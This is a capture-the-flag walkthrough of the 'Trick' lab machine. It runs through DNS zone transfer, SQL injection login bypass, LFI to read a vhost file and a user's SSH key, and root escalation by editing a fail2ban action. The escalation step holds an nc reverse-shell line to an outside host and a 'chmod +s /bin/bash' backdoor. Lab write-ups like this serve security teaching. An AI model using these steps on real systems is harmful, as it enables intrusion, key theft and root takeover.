Trick an easy linux machine involved performing DNS zone transfer which lead to a management system vulnerable to sqli allowing us to login, through sqli, exploiting LFI to read vhost file to get another subdomain which was also had LFI but the site was running as the user michael and with that accessing the private key and getting a shell, this user can run fail2ban by restarting it so modifying a fail2ban action by including a reverse shell or any command which will be executed as root.
NMAP
Nmap scan report for 10.129.85.201
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
On the web page we see a bootstrap template which has nothing interesting
Fuzzing for files and directories it didn’t found anything as well
PORT 53 (DNS)
Having dns service running we can try to see if we can query dns records or perform dns zone transfer for that we need a domain name, we can get the domain by performing a reverse dns lookup which resolve IP to domain name
https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
dig -x 10.10.11.166 @10.10.11.166
Having the trick.htb we can add this in hosts file
Now to enumerate further we can perform the dns zone transfer
This shows root.trick.htb subdomain but it doesn't take us anywhere, on performing zone transfer with axfr
We get another domain name preprod-payroll.trick.htb, so let's add this in hosts file as well
Visiting this subdomain, we’ll get a login page on which we can try default credentials
Which didn’t worked, so next I tried sqli
That worked, so I tried running sqlmap but time-based blind so it's gonna take a lot of time in dumping the data
Foothold
Going back to the site we can see a GET parameter page fetching for pages, I tried to perform LFI on that parameter but it didn't worked
I tried running wfuzz against the parameter using LFI wordlist
Which didn’t worked but the web app had sql injection in ton of places, on viewing employee details intercepting the request, we’ll get a GET parameter id which also is vulnerable to sqli
It shows that it’s boolean-blind as on the login page it was a time based sqli so with this we can perform LFI to read nginx vhost configuration file
This shows another subdomain preprod-marketing.trick.htb
Alternatively we can enumerate this subdomain by running wfuzz
This loads up another site, having nothing special other than the same GET parameter, so I tried running LFI wordlist here as well
This started to give us some output on, filtering the response we see some changes in the response and got LFI
We have the username michael , we can try to see if we can access his .ssh folder for id_rsa
Privilege Escalation
Running sudo -l to check if we can run with sudo privileges
We can restart the fail2ban service but we don't know exactly what we need to edit, being in security group we can check what permissions this group has
We have write access to this folder which has configuration files for fail2ban
I found an article explaining how we can abuse fail2ban config file
For this we need to edit the actionban command in iptables-multiport.conf, so first let's copy this file in /tmp or other directory where we can edit it with a reverse shell
/usr/bin/nc 10.10.14.39 2222 -e /bin/bashAfter editing the config file, move it back to the action.d folder and restart fail2ban service
Then start doing fail attempts on login, you’ll get a reverse shell on your port
But our reverse shell connection dies and the reason behind this is the ban duration lasts for 10 seconds and bans the host after the 5th attempt
Instead of getting a reverse shell we can just make bash a SUID with chmod +s /bin/bash
Performing the invalid login attempts on ssh will trigger the fail2ban on the 5th invalid attempt
